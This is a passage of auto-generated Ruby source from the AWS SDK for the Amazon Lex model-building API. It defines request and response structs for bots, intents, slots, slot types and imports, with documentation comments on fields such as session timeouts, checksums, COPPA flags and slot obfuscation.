https://docs.aws.amazon.com/lex/latest/dg/built-in-intent-fallback.html # @return [Types::Statement] # # @!attribute [rw] idle_session_ttl_in_seconds # The maximum time in seconds that Amazon Lex retains the data # gathered in a conversation. # # A user interaction session remains active for the amount of time # specified. If no conversation occurs during this time, the session # expires and Amazon Lex deletes any data provided before the timeout. # # For example, suppose that a user chooses the OrderPizza intent, but # gets sidetracked halfway through placing an order. If the user # doesn't complete the order within the specified time, Amazon Lex # discards the slot information that it gathered, and the user must # start over. # # If you don't include the `idleSessionTTLInSeconds` element in a # `PutBot` operation request, Amazon Lex uses the default value. This # is also true if the request replaces an existing bot. # # The default is 300 seconds (5 minutes). # @return [Integer] # # @!attribute [rw] voice_id # The Amazon Polly voice ID that you want Amazon Lex to use for voice # interactions with the user. The locale configured for the voice must # match the locale of the bot. For more information, see [Voices in # Amazon Polly][1] in the *Amazon Polly Developer Guide*. # # # # [1]: https://docs.aws.amazon.com/polly/latest/dg/voicelist.html # @return [String] # # @!attribute [rw] checksum # Identifies a specific revision of the `$LATEST` version. # # When you create a new bot, leave the `checksum` field blank. If you # specify a checksum you get a `BadRequestException` exception. # # When you want to update a bot, set the `checksum` field to the # checksum of the most recent revision of the `$LATEST` version. If # you don't specify the ` checksum` field, or if the checksum does # not match the `$LATEST` version, you get a # `PreconditionFailedException` exception. # @return [String] # # @!attribute [rw] process_behavior # If you set the `processBehavior` element to `BUILD`, Amazon Lex # builds the bot so that it can be run. If you set the element to # `SAVE` Amazon Lex saves the bot, but doesn't build it. # # If you don't specify this value, the default value is `BUILD`. # @return [String] # # @!attribute [rw] locale # Specifies the target locale for the bot. Any intent used in the bot # must be compatible with the locale of the bot. # # The default is `en-US`. # @return [String] # # @!attribute [rw] child_directed # For each Amazon Lex bot created with the Amazon Lex Model Building # Service, you must specify whether your use of Amazon Lex is related # to a website, program, or other application that is directed or # targeted, in whole or in part, to children under age 13 and subject # to the Children's Online Privacy Protection Act (COPPA) by # specifying `true` or `false` in the `childDirected` field. By # specifying `true` in the `childDirected` field, you confirm that # your use of Amazon Lex **is** related to a website, program, or # other application that is directed or targeted, in whole or in part, # to children under age 13 and subject to COPPA. By specifying `false` # in the `childDirected` field, you confirm that your use of Amazon # Lex **is not** related to a website, program, or other application # that is directed or targeted, in whole or in part, to children under # age 13 and subject to COPPA. You may not specify a default value for # the `childDirected` field that does not accurately reflect whether # your use of Amazon Lex is related to a website, program, or other # application that is directed or targeted, in whole or in part, to # children under age 13 and subject to COPPA. # # If your use of Amazon Lex relates to a website, program, or other # application that is directed in whole or in part, to children under # age 13, you must obtain any required verifiable parental consent # under COPPA. For information regarding the use of Amazon Lex in # connection with websites, programs, or other applications that are # directed or targeted, in whole or in part, to children under age 13, # see the [Amazon Lex FAQ.][1] # # # # [1]: https://aws.amazon.com/lex/faqs#data-security # @return [Boolean] # # @!attribute [rw] detect_sentiment # When set to `true` user utterances are sent to Amazon Comprehend for # sentiment analysis. If you don't specify `detectSentiment`, the # default is `false`. # @return [Boolean] # # @!attribute [rw] create_version # When set to `true` a new numbered version of the bot is created. # This is the same as calling the `CreateBotVersion` operation. If you # don't specify `createVersion`, the default is `false`. # @return [Boolean] # # @!attribute [rw] tags # A list of tags to add to the bot. You can only add tags when you # create a bot, you can't use the `PutBot` operation to update the # tags on a bot. To update tags, use the `TagResource` operation. # @return [Array<Types::Tag>] # # @see http://docs.aws.amazon.com/goto/WebAPI/lex-models-2017-04-19/PutBotRequest AWS API Documentation # class PutBotRequest < Struct.new( :name, :description, :intents, :enable_model_improvements, :nlu_intent_confidence_threshold, :clarification_prompt, :abort_statement, :idle_session_ttl_in_seconds, :voice_id, :checksum, :process_behavior, :locale, :child_directed, :detect_sentiment, :create_version, :tags) SENSITIVE = [] include Aws::Structure end # @!attribute [rw] name # The name of the bot. # @return [String] # # @!attribute [rw] description # A description of the bot. # @return [String] # # @!attribute [rw] intents # An array of `Intent` objects. For more information, see PutBot. # @return [Array<Types::Intent>] # # @!attribute [rw] enable_model_improvements # Indicates whether the bot uses accuracy improvements. `true` # indicates that the bot is using the improvements, otherwise, # `false`. # @return [Boolean] # # @!attribute [rw] nlu_intent_confidence_threshold # The score that determines where Amazon Lex inserts the # `AMAZON.FallbackIntent`, `AMAZON.KendraSearchIntent`, or both when # returning alternative intents in a [PostContent][1] or [PostText][2] # response. `AMAZON.FallbackIntent` is inserted if the confidence # score for all intents is below this value. # `AMAZON.KendraSearchIntent` is only inserted if it is configured for # the bot. # # # # [1]: https://docs.aws.amazon.com/lex/latest/dg/API_runtime_PostContent.html # [2]: https://docs.aws.amazon.com/lex/latest/dg/API_runtime_PostText.html # @return [Float] # # @!attribute [rw] clarification_prompt # The prompts that Amazon Lex uses when it doesn't understand the # user's intent. For more information, see PutBot. # @return [Types::Prompt] # # @!attribute [rw] abort_statement # The message that Amazon Lex uses to cancel a conversation. For more # information, see PutBot. # @return [Types::Statement] # # @!attribute [rw] status # When you send a request to create a bot with `processBehavior` set # to `BUILD`, Amazon Lex sets the `status` response element to # `BUILDING`. # # In the `READY_BASIC_TESTING` state you can test the bot with user # inputs that exactly match the utterances configured for the bot's # intents and values in the slot types. # # If Amazon Lex can't build the bot, Amazon Lex sets `status` to # `FAILED`. Amazon Lex returns the reason for the failure in the # `failureReason` response element. # # When you set `processBehavior` to `SAVE`, Amazon Lex sets the status # code to `NOT BUILT`. # # When the bot is in the `READY` state you can test and publish the # bot. # @return [String] # # @!attribute [rw] failure_reason # If `status` is `FAILED`, Amazon Lex provides the reason that it # failed to build the bot. # @return [String] # # @!attribute [rw] last_updated_date # The date that the bot was updated. When you create a resource, the # creation date and last updated date are the same. # @return [Time] # # @!attribute [rw] created_date # The date that the bot was created. # @return [Time] # # @!attribute [rw] idle_session_ttl_in_seconds # The maximum length of time that Amazon Lex retains the data gathered # in a conversation. For more information, see PutBot. # @return [Integer] # # @!attribute [rw] voice_id # The Amazon Polly voice ID that Amazon Lex uses for voice interaction # with the user. For more information, see PutBot. # @return [String] # # @!attribute [rw] checksum # Checksum of the bot that you created. # @return [String] # # @!attribute [rw] version # The version of the bot. For a new bot, the version is always # `$LATEST`. # @return [String] # # @!attribute [rw] locale # The target locale for the bot. # @return [String] # # @!attribute [rw] child_directed # For each Amazon Lex bot created with the Amazon Lex Model Building # Service, you must specify whether your use of Amazon Lex is related # to a website, program, or other application that is directed or # targeted, in whole or in part, to children under age 13 and subject # to the Children's Online Privacy Protection Act (COPPA) by # specifying `true` or `false` in the `childDirected` field. By # specifying `true` in the `childDirected` field, you confirm that # your use of Amazon Lex **is** related to a website, program, or # other application that is directed or targeted, in whole or in part, # to children under age 13 and subject to COPPA. By specifying `false` # in the `childDirected` field, you confirm that your use of Amazon # Lex **is not** related to a website, program, or other application # that is directed or targeted, in whole or in part, to children under # age 13 and subject to COPPA. You may not specify a default value for # the `childDirected` field that does not accurately reflect whether # your use of Amazon Lex is related to a website, program, or other # application that is directed or targeted, in whole or in part, to # children under age 13 and subject to COPPA. # # If your use of Amazon Lex relates to a website, program, or other # application that is directed in whole or in part, to children under # age 13, you must obtain any required verifiable parental consent # under COPPA. For information regarding the use of Amazon Lex in # connection with websites, programs, or other applications that are # directed or targeted, in whole or in part, to children under age 13, # see the [Amazon Lex FAQ.][1] # # # # [1]: https://aws.amazon.com/lex/faqs#data-security # @return [Boolean] # # @!attribute [rw] create_version # `True` if a new version of the bot was created. If the # `createVersion` field was not specified in the request, the # `createVersion` field is set to false in the response. # @return [Boolean] # # @!attribute [rw] detect_sentiment # `true` if the bot is configured to send user utterances to Amazon # Comprehend for sentiment analysis. If the `detectSentiment` field # was not specified in the request, the `detectSentiment` field is # `false` in the response. # @return [Boolean] # # @!attribute [rw] tags # A list of tags associated with the bot. # @return [Array<Types::Tag>] # # @see http://docs.aws.amazon.com/goto/WebAPI/lex-models-2017-04-19/PutBotResponse AWS API Documentation # class PutBotResponse < Struct.new( :name, :description, :intents, :enable_model_improvements, :nlu_intent_confidence_threshold, :clarification_prompt, :abort_statement, :status, :failure_reason, :last_updated_date, :created_date, :idle_session_ttl_in_seconds, :voice_id, :checksum, :version, :locale, :child_directed, :create_version, :detect_sentiment, :tags) SENSITIVE = [] include Aws::Structure end # @note When making an API call, you may pass PutIntentRequest # data as a hash: # # { # name: "IntentName", # required # description: "Description", # slots: [ # { # name: "SlotName", # required # description: "Description", # slot_constraint: "Required", # required, accepts Required, Optional # slot_type: "CustomOrBuiltinSlotTypeName", # slot_type_version: "Version", # value_elicitation_prompt: { # messages: [ # required # { # content_type: "PlainText", # required, accepts PlainText, SSML, CustomPayload # content: "ContentString", # required # group_number: 1, # }, # ], # max_attempts: 1, # required # response_card: "ResponseCard", # }, # priority: 1, # sample_utterances: ["Utterance"], # response_card: "ResponseCard", # obfuscation_setting: "NONE", # accepts NONE, DEFAULT_OBFUSCATION # }, # ], # sample_utterances: ["Utterance"], # confirmation_prompt: { # messages: [ # required # { # content_type: "PlainText", # required, accepts PlainText, SSML, CustomPayload # content: "ContentString", # required # group_number: 1, # }, # ], # max_attempts: 1, # required # response_card: "ResponseCard", # }, # rejection_statement: { # messages: [ # required # { # content_type: "PlainText", # required, accepts PlainText, SSML, CustomPayload # content: "ContentString", # required # group_number: 1, # }, # ], # response_card: "ResponseCard", # }, # follow_up_prompt: { # prompt: { # required # messages: [ # required # { # content_type: "PlainText", # required, accepts PlainText, SSML, CustomPayload # content: "ContentString", # required # group_number: 1, # }, # ], # max_attempts: 1, # required # response_card: "ResponseCard", # }, # rejection_statement: { # required # messages: [ # required # { # content_type: "PlainText", # required, accepts PlainText, SSML, CustomPayload # content: "ContentString", # required # group_number: 1, # }, # ], # response_card: "ResponseCard", # }, # }, # conclusion_statement: { # messages: [ # required # { # content_type: "PlainText", # required, accepts PlainText, SSML, CustomPayload # content: "ContentString", # required # group_number: 1, # }, # ], # response_card: "ResponseCard", # }, # dialog_code_hook: { # uri: "LambdaARN", # required # message_version: "MessageVersion", # required # }, # fulfillment_activity: { # type: "ReturnIntent", # required, accepts ReturnIntent, CodeHook # code_hook: { # uri: "LambdaARN", # required # message_version: "MessageVersion", # required # }, # }, # parent_intent_signature: "BuiltinIntentSignature", # checksum: "String", # create_version: false, # kendra_configuration: { # kendra_index: "KendraIndexArn", # required # query_filter_string: "QueryFilterString", # role: "roleArn", # required # }, # } # # @!attribute [rw] name # The name of the intent. The name is *not* case sensitive. # # The name can't match a built-in intent name, or a built-in intent # name with "AMAZON." removed. For example, because there is a # built-in intent called `AMAZON.HelpIntent`, you can't create a # custom intent called `HelpIntent`. # # For a list of built-in intents, see [Standard Built-in Intents][1] # in the *Alexa Skills Kit*. # # # # [1]: https://developer.amazon.com/public/solutions/alexa/alexa-skills-kit/docs/built-in-intent-ref/standard-intents # @return [String] # # @!attribute [rw] description # A description of the intent. # @return [String] # # @!attribute [rw] slots # An array of intent slots. At runtime, Amazon Lex elicits required # slot values from the user using prompts defined in the slots. For # more information, see how-it-works. # @return [Array<Types::Slot>] # # @!attribute [rw] sample_utterances # An array of utterances (strings) that a user might say to signal the # intent. For example, "I want \\\{PizzaSize\\} pizza", "Order # \\\{Quantity\\} \\\{PizzaSize\\} pizzas". # # In each utterance, a slot name is enclosed in curly braces. # @return [Array<String>] # # @!attribute [rw] confirmation_prompt # Prompts the user to confirm the intent. This question should have a # yes or no answer. # # Amazon Lex uses this prompt to ensure that the user acknowledges # that the intent is ready for fulfillment. For example, with the # `OrderPizza` intent, you might want to confirm that the order is # correct before placing it. For other intents, such as intents that # simply respond to user questions, you might not need to ask the user # for confirmation before providing the information. # # <note markdown="1"> You you must provide both the `rejectionStatement` and the # `confirmationPrompt`, or neither. # # </note> # @return [Types::Prompt] # # @!attribute [rw] rejection_statement # When the user answers "no" to the question defined in # `confirmationPrompt`, Amazon Lex responds with this statement to # acknowledge that the intent was canceled. # # <note markdown="1"> You must provide both the `rejectionStatement` and the # `confirmationPrompt`, or neither. # # </note> # @return [Types::Statement] # # @!attribute [rw] follow_up_prompt # Amazon Lex uses this prompt to solicit additional activity after # fulfilling an intent. For example, after the `OrderPizza` intent is # fulfilled, you might prompt the user to order a drink. # # The action that Amazon Lex takes depends on the user's response, as # follows: # # * If the user says "Yes" it responds with the clarification prompt # that is configured for the bot. # # * if the user says "Yes" and continues with an utterance that # triggers an intent it starts a conversation for the intent. # # * If the user says "No" it responds with the rejection statement # configured for the the follow-up prompt. # # * If it doesn't recognize the utterance it repeats the follow-up # prompt again. # # The `followUpPrompt` field and the `conclusionStatement` field are # mutually exclusive. You can specify only one. # @return [Types::FollowUpPrompt] # # @!attribute [rw] conclusion_statement # The statement that you want Amazon Lex to convey to the user after # the intent is successfully fulfilled by the Lambda function. # # This element is relevant only if you provide a Lambda function in # the `fulfillmentActivity`. If you return the intent to the client # application, you can't specify this element. # # <note markdown="1"> The `followUpPrompt` and `conclusionStatement` are mutually # exclusive. You can specify only one. # # </note> # @return [Types::Statement] # # @!attribute [rw] dialog_code_hook # Specifies a Lambda function to invoke for each user input. You can # invoke this Lambda function to personalize user interaction. # # For example, suppose your bot determines that the user is John. Your # Lambda function might retrieve John's information from a backend # database and prepopulate some of the values. For example, if you # find that John is gluten intolerant, you might set the corresponding # intent slot, `GlutenIntolerant`, to true. You might find John's # phone number and set the corresponding session attribute. # @return [Types::CodeHook] # # @!attribute [rw] fulfillment_activity # Required. Describes how the intent is fulfilled. For example, after # a user provides all of the information for a pizza order, # `fulfillmentActivity` defines how the bot places an order with a # local pizza store. # # You might configure Amazon Lex to return all of the intent # information to the client application, or direct it to invoke a # Lambda function that can process the intent (for example, place an # order with a pizzeria). # @return [Types::FulfillmentActivity] # # @!attribute [rw] parent_intent_signature # A unique identifier for the built-in intent to base this intent on. # To find the signature for an intent, see [Standard Built-in # Intents][1] in the *Alexa Skills Kit*. # # # # [1]: https://developer.amazon.com/public/solutions/alexa/alexa-skills-kit/docs/built-in-intent-ref/standard-intents # @return [String] # # @!attribute [rw] checksum # Identifies a specific revision of the `$LATEST` version. # # When you create a new intent, leave the `checksum` field blank. If # you specify a checksum you get a `BadRequestException` exception. # # When you want to update a intent, set the `checksum` field to the # checksum of the most recent revision of the `$LATEST` version. If # you don't specify the ` checksum` field, or if the checksum does # not match the `$LATEST` version, you get a # `PreconditionFailedException` exception. # @return [String] # # @!attribute [rw] create_version # When set to `true` a new numbered version of the intent is created. # This is the same as calling the `CreateIntentVersion` operation. If # you do not specify `createVersion`, the default is `false`. # @return [Boolean] # # @!attribute [rw] kendra_configuration # Configuration information required to use the # `AMAZON.KendraSearchIntent` intent to connect to an Amazon Kendra # index. For more information, see [ AMAZON.KendraSearchIntent][1]. # # # # [1]: http://docs.aws.amazon.com/lex/latest/dg/built-in-intent-kendra-search.html # @return [Types::KendraConfiguration] # # @see http://docs.aws.amazon.com/goto/WebAPI/lex-models-2017-04-19/PutIntentRequest AWS API Documentation # class PutIntentRequest < Struct.new( :name, :description, :slots, :sample_utterances, :confirmation_prompt, :rejection_statement, :follow_up_prompt, :conclusion_statement, :dialog_code_hook, :fulfillment_activity, :parent_intent_signature, :checksum, :create_version, :kendra_configuration) SENSITIVE = [] include Aws::Structure end # @!attribute [rw] name # The name of the intent. # @return [String] # # @!attribute [rw] description # A description of the intent. # @return [String] # # @!attribute [rw] slots # An array of intent slots that are configured for the intent. # @return [Array<Types::Slot>] # # @!attribute [rw] sample_utterances # An array of sample utterances that are configured for the intent. # @return [Array<String>] # # @!attribute [rw] confirmation_prompt # If defined in the intent, Amazon Lex prompts the user to confirm the # intent before fulfilling it. # @return [Types::Prompt] # # @!attribute [rw] rejection_statement # If the user answers "no" to the question defined in # `confirmationPrompt` Amazon Lex responds with this statement to # acknowledge that the intent was canceled. # @return [Types::Statement] # # @!attribute [rw] follow_up_prompt # If defined in the intent, Amazon Lex uses this prompt to solicit # additional user activity after the intent is fulfilled. # @return [Types::FollowUpPrompt] # # @!attribute [rw] conclusion_statement # After the Lambda function specified in # the`fulfillmentActivity`intent fulfills the intent, Amazon Lex # conveys this statement to the user. # @return [Types::Statement] # # @!attribute [rw] dialog_code_hook # If defined in the intent, Amazon Lex invokes this Lambda function # for each user input. # @return [Types::CodeHook] # # @!attribute [rw] fulfillment_activity # If defined in the intent, Amazon Lex invokes this Lambda function to # fulfill the intent after the user provides all of the information # required by the intent. # @return [Types::FulfillmentActivity] # # @!attribute [rw] parent_intent_signature # A unique identifier for the built-in intent that this intent is # based on. # @return [String] # # @!attribute [rw] last_updated_date # The date that the intent was updated. When you create a resource, # the creation date and last update dates are the same. # @return [Time] # # @!attribute [rw] created_date # The date that the intent was created. # @return [Time] # # @!attribute [rw] version # The version of the intent. For a new intent, the version is always # `$LATEST`. # @return [String] # # @!attribute [rw] checksum # Checksum of the `$LATEST`version of the intent created or updated. # @return [String] # # @!attribute [rw] create_version # `True` if a new version of the intent was created. If the # `createVersion` field was not specified in the request, the # `createVersion` field is set to false in the response. # @return [Boolean] # # @!attribute [rw] kendra_configuration # Configuration information, if any, required to connect to an Amazon # Kendra index and use the `AMAZON.KendraSearchIntent` intent. # @return [Types::KendraConfiguration] # # @see http://docs.aws.amazon.com/goto/WebAPI/lex-models-2017-04-19/PutIntentResponse AWS API Documentation # class PutIntentResponse < Struct.new( :name, :description, :slots, :sample_utterances, :confirmation_prompt, :rejection_statement, :follow_up_prompt, :conclusion_statement, :dialog_code_hook, :fulfillment_activity, :parent_intent_signature, :last_updated_date, :created_date, :version, :checksum, :create_version, :kendra_configuration) SENSITIVE = [] include Aws::Structure end # @note When making an API call, you may pass PutSlotTypeRequest # data as a hash: # # { # name: "SlotTypeName", # required # description: "Description", # enumeration_values: [ # { # value: "Value", # required # synonyms: ["Value"], # }, # ], # checksum: "String", # value_selection_strategy: "ORIGINAL_VALUE", # accepts ORIGINAL_VALUE, TOP_RESOLUTION # create_version: false, # parent_slot_type_signature: "CustomOrBuiltinSlotTypeName", # slot_type_configurations: [ # { # regex_configuration: { # pattern: "RegexPattern", # required # }, # }, # ], # } # # @!attribute [rw] name # The name of the slot type. The name is *not* case sensitive. # # The name can't match a built-in slot type name, or a built-in slot # type name with "AMAZON." removed. For example, because there is a # built-in slot type called `AMAZON.DATE`, you can't create a custom # slot type called `DATE`. # # For a list of built-in slot types, see [Slot Type Reference][1] in # the *Alexa Skills Kit*. # # # # [1]: https://developer.amazon.com/public/solutions/alexa/alexa-skills-kit/docs/built-in-intent-ref/slot-type-reference # @return [String] # # @!attribute [rw] description # A description of the slot type. # @return [String] # # @!attribute [rw] enumeration_values # A list of `EnumerationValue` objects that defines the values that # the slot type can take. Each value can have a list of `synonyms`, # which are additional values that help train the machine learning # model about the values that it resolves for a slot. # # A regular expression slot type doesn't require enumeration values. # All other slot types require a list of enumeration values. # # When Amazon Lex resolves a slot value, it generates a resolution # list that contains up to five possible values for the slot. If you # are using a Lambda function, this resolution list is passed to the # function. If you are not using a Lambda function you can choose to # return the value that the user entered or the first value in the # resolution list as the slot value. The `valueSelectionStrategy` # field indicates the option to use. # @return [Array<Types::EnumerationValue>] # # @!attribute [rw] checksum # Identifies a specific revision of the `$LATEST` version. # # When you create a new slot type, leave the `checksum` field blank. # If you specify a checksum you get a `BadRequestException` exception. # # When you want to update a slot type, set the `checksum` field to the # checksum of the most recent revision of the `$LATEST` version. If # you don't specify the ` checksum` field, or if the checksum does # not match the `$LATEST` version, you get a # `PreconditionFailedException` exception. # @return [String] # # @!attribute [rw] value_selection_strategy # Determines the slot resolution strategy that Amazon Lex uses to # return slot type values. The field can be set to one of the # following values: # # * `ORIGINAL_VALUE` - Returns the value entered by the user, if the # user value is similar to the slot value. # # * `TOP_RESOLUTION` - If there is a resolution list for the slot, # return the first value in the resolution list as the slot type # value. If there is no resolution list, null is returned. # # If you don't specify the `valueSelectionStrategy`, the default is # `ORIGINAL_VALUE`. # @return [String] # # @!attribute [rw] create_version # When set to `true` a new numbered version of the slot type is # created. This is the same as calling the `CreateSlotTypeVersion` # operation. If you do not specify `createVersion`, the default is # `false`. # @return [Boolean] # # @!attribute [rw] parent_slot_type_signature # The built-in slot type used as the parent of the slot type. When you # define a parent slot type, the new slot type has all of the same # configuration as the parent. # # Only `AMAZON.AlphaNumeric` is supported. # @return [String] # # @!attribute [rw] slot_type_configurations # Configuration information that extends the parent built-in slot # type. The configuration is added to the settings for the parent slot # type. # @return [Array<Types::SlotTypeConfiguration>] # # @see http://docs.aws.amazon.com/goto/WebAPI/lex-models-2017-04-19/PutSlotTypeRequest AWS API Documentation # class PutSlotTypeRequest < Struct.new( :name, :description, :enumeration_values, :checksum, :value_selection_strategy, :create_version, :parent_slot_type_signature, :slot_type_configurations) SENSITIVE = [] include Aws::Structure end # @!attribute [rw] name # The name of the slot type. # @return [String] # # @!attribute [rw] description # A description of the slot type. # @return [String] # # @!attribute [rw] enumeration_values # A list of `EnumerationValue` objects that defines the values that # the slot type can take. # @return [Array<Types::EnumerationValue>] # # @!attribute [rw] last_updated_date # The date that the slot type was updated. When you create a slot # type, the creation date and last update date are the same. # @return [Time] # # @!attribute [rw] created_date # The date that the slot type was created. # @return [Time] # # @!attribute [rw] version # The version of the slot type. For a new slot type, the version is # always `$LATEST`. # @return [String] # # @!attribute [rw] checksum # Checksum of the `$LATEST` version of the slot type. # @return [String] # # @!attribute [rw] value_selection_strategy # The slot resolution strategy that Amazon Lex uses to determine the # value of the slot. For more information, see PutSlotType. # @return [String] # # @!attribute [rw] create_version # `True` if a new version of the slot type was created. If the # `createVersion` field was not specified in the request, the # `createVersion` field is set to false in the response. # @return [Boolean] # # @!attribute [rw] parent_slot_type_signature # The built-in slot type used as the parent of the slot type. # @return [String] # # @!attribute [rw] slot_type_configurations # Configuration information that extends the parent built-in slot # type. # @return [Array<Types::SlotTypeConfiguration>] # # @see http://docs.aws.amazon.com/goto/WebAPI/lex-models-2017-04-19/PutSlotTypeResponse AWS API Documentation # class PutSlotTypeResponse < Struct.new( :name, :description, :enumeration_values, :last_updated_date, :created_date, :version, :checksum, :value_selection_strategy, :create_version, :parent_slot_type_signature, :slot_type_configurations) SENSITIVE = [] include Aws::Structure end # The resource that you are attempting to delete is referred to by # another resource. Use this information to remove references to the # resource that you are trying to delete. # # The body of the exception contains a JSON object that describes the # resource. # # `\{ "resourceType": BOT | BOTALIAS | BOTCHANNEL | INTENT,` # # `"resourceReference": \{` # # `"name": string, "version": string \} \}` # # @!attribute [rw] reference_type # @return [String] # # @!attribute [rw] example_reference # Describes the resource that refers to the resource that you are # attempting to delete. This object is returned as part of the # `ResourceInUseException` exception. # @return [Types::ResourceReference] # # @see http://docs.aws.amazon.com/goto/WebAPI/lex-models-2017-04-19/ResourceInUseException AWS API Documentation # class ResourceInUseException < Struct.new( :reference_type, :example_reference) SENSITIVE = [] include Aws::Structure end # Describes the resource that refers to the resource that you are # attempting to delete. This object is returned as part of the # `ResourceInUseException` exception. # # @!attribute [rw] name # The name of the resource that is using the resource that you are # trying to delete. # @return [String] # # @!attribute [rw] version # The version of the resource that is using the resource that you are # trying to delete. # @return [String] # # @see http://docs.aws.amazon.com/goto/WebAPI/lex-models-2017-04-19/ResourceReference AWS API Documentation # class ResourceReference < Struct.new( :name, :version) SENSITIVE = [] include Aws::Structure end # Identifies the version of a specific slot. # # @note When making an API call, you may pass Slot # data as a hash: # # { # name: "SlotName", # required # description: "Description", # slot_constraint: "Required", # required, accepts Required, Optional # slot_type: "CustomOrBuiltinSlotTypeName", # slot_type_version: "Version", # value_elicitation_prompt: { # messages: [ # required # { # content_type: "PlainText", # required, accepts PlainText, SSML, CustomPayload # content: "ContentString", # required # group_number: 1, # }, # ], # max_attempts: 1, # required # response_card: "ResponseCard", # }, # priority: 1, # sample_utterances: ["Utterance"], # response_card: "ResponseCard", # obfuscation_setting: "NONE", # accepts NONE, DEFAULT_OBFUSCATION # } # # @!attribute [rw] name # The name of the slot. # @return [String] # # @!attribute [rw] description # A description of the slot. # @return [String] # # @!attribute [rw] slot_constraint # Specifies whether the slot is required or optional. # @return [String] # # @!attribute [rw] slot_type # The type of the slot, either a custom slot type that you defined or # one of the built-in slot types. # @return [String] # # @!attribute [rw] slot_type_version # The version of the slot type. # @return [String] # # @!attribute [rw] value_elicitation_prompt # The prompt that Amazon Lex uses to elicit the slot value from the # user. # @return [Types::Prompt] # # @!attribute [rw] priority # Directs Amazon Lex the order in which to elicit this slot value from # the user. For example, if the intent has two slots with priorities 1 # and 2, AWS Amazon Lex first elicits a value for the slot with # priority 1. # # If multiple slots share the same priority, the order in which Amazon # Lex elicits values is arbitrary. # @return [Integer] # # @!attribute [rw] sample_utterances # If you know a specific pattern with which users might respond to an # Amazon Lex request for a slot value, you can provide those # utterances to improve accuracy. This is optional. In most cases, # Amazon Lex is capable of understanding user utterances. # @return [Array<String>] # # @!attribute [rw] response_card # A set of possible responses for the slot type used by text-based # clients. A user chooses an option from the response card, instead of # using text to reply. # @return [String] # # @!attribute [rw] obfuscation_setting # Determines whether a slot is obfuscated in conversation logs and # stored utterances. When you obfuscate a slot, the value is replaced # by the slot name in curly braces (\\\{\\}). For example, if the slot # name is "full\_name", obfuscated values are replaced with # "\\\{full\_name\\}". For more information, see [ Slot Obfuscation # ][1]. # # # # [1]: https://docs.aws.amazon.com/lex/latest/dg/how-obfuscate.html # @return [String] # # @see http://docs.aws.amazon.com/goto/WebAPI/lex-models-2017-04-19/Slot AWS API Documentation # class Slot < Struct.new( :name, :description, :slot_constraint, :slot_type, :slot_type_version, :value_elicitation_prompt, :priority, :sample_utterances, :response_card, :obfuscation_setting) SENSITIVE = [] include Aws::Structure end # Provides configuration information for a slot type. # # @note When making an API call, you may pass SlotTypeConfiguration # data as a hash: # # { # regex_configuration: { # pattern: "RegexPattern", # required # }, # } # # @!attribute [rw] regex_configuration # A regular expression used to validate the value of a slot. # @return [Types::SlotTypeRegexConfiguration] # # @see http://docs.aws.amazon.com/goto/WebAPI/lex-models-2017-04-19/SlotTypeConfiguration AWS API Documentation # class SlotTypeConfiguration < Struct.new( :regex_configuration) SENSITIVE = [] include Aws::Structure end # Provides information about a slot type.. # # @!attribute [rw] name # The name of the slot type. # @return [String] # # @!attribute [rw] description # A description of the slot type. # @return [String] # # @!attribute [rw] last_updated_date # The date that the slot type was updated. When you create a resource, # the creation date and last updated date are the same. # @return [Time] # # @!attribute [rw] created_date # The date that the slot type was created. # @return [Time] # # @!attribute [rw] version # The version of the slot type. # @return [String] # # @see http://docs.aws.amazon.com/goto/WebAPI/lex-models-2017-04-19/SlotTypeMetadata AWS API Documentation # class SlotTypeMetadata < Struct.new( :name, :description, :last_updated_date, :created_date, :version) SENSITIVE = [] include Aws::Structure end # Provides a regular expression used to validate the value of a slot. # # @note When making an API call, you may pass SlotTypeRegexConfiguration # data as a hash: # # { # pattern: "RegexPattern", # required # } # # @!attribute [rw] pattern # A regular expression used to validate the value of a slot. # # Use a standard regular expression. Amazon Lex supports the following # characters in the regular expression: # # * A-Z, a-z # # * 0-9 # # * Unicode characters ("\\ u&lt;Unicode&gt;") # # Represent Unicode characters with four digits, for example # "\\u0041" or "\\u005A". # # The following regular expression operators are not supported: # # * Infinite repeaters: *, +, or \\\{x,\\} with no upper bound. # # * Wild card (.) # @return [String] # # @see http://docs.aws.amazon.com/goto/WebAPI/lex-models-2017-04-19/SlotTypeRegexConfiguration AWS API Documentation # class SlotTypeRegexConfiguration < Struct.new( :pattern) SENSITIVE = [] include Aws::Structure end # @note When making an API call, you may pass StartImportRequest # data as a hash: # # { # payload: "data", # required # resource_type: "BOT", # required, accepts BOT, INTENT, SLOT_TYPE # merge_strategy: "OVERWRITE_LATEST", # required, accepts OVERWRITE_LATEST, FAIL_ON_CONFLICT # tags: [ # { # key: "TagKey", # required # value: "TagValue", # required # }, # ], # } # # @!attribute [rw] payload # A zip archive in binary format. The archive should contain one file, # a JSON file containing the resource to import. The resource should # match the type specified in the `resourceType` field. # @return [String] # # @!attribute [rw] resource_type # Specifies the type of resource to export. Each resource also exports # any resources that it depends on. # # * A bot exports dependent intents. # # * An intent exports dependent slot types. # @return [String] # # @!attribute [rw] merge_strategy # Specifies the action that the `StartImport` operation should take # when there is an existing resource with the same name. # # * FAIL\_ON\_CONFLICT - The import operation is stopped on the first # conflict between a resource in the import file and an existing # resource. The name of the resource causing the conflict is in the # `failureReason` field of the response to the `GetImport` # operation. # # OVERWRITE\_LATEST - The import operation proceeds even if there is # a conflict with an existing resource. The $LASTEST version of the # existing resource is overwritten with the data from the import # file. # @return [String] # # @!attribute [rw] tags # A list of tags to add to the imported bot. You can only add tags # when you import a bot, you can't add tags to an intent or slot # type. # @return [Array<Types::Tag>] # # @see http://docs.aws.amazon.com/goto/WebAPI/lex-models-2017-04-19/StartImportRequest AWS API Documentation # class StartImportRequest < Struct.new( :payload, :resource_type, :merge_strategy, :tags) SENSITIVE = [] include Aws::Structure end # @!attribute [rw] name # The name given to the import job. # @return [String] # # @!attribute [rw] resource_type # The type of resource to import. # @return [String] # # @!attribute [rw] merge_strategy # The action to take when there is a merge conflict. # @return [String] # # @!attribute [rw] import_id # The identifier for the specific import job. # @return [String] # # @!attribute [rw] import_status # The status of the import job. If the status is `FAILED`, you can get # the reason for the failure using the `GetImport` operation. # @return [String] # # @!attribute [rw] tags # A list of tags added to the imported bot. # @return [Array<Types::Tag>] # # @!attribute [rw] created_date # A timestamp for the date and time that the import job was requested. # @return [Time] # # @see http://docs.aws.amazon.com/goto/WebAPI/lex-models-2017-04-19/StartImportResponse AWS API Documentation # class StartImportResponse < Struct.new( :name, :resource_type, :merge_strategy, :import_id, :import_status, :tags, :created_date) SENSITIVE = [] include Aws::Structure end # A collection of messages that convey information to the user. At # runtime, Amazon Lex selects the message to convey. # # @note When making an API call, you may pass Statement # data as a hash: 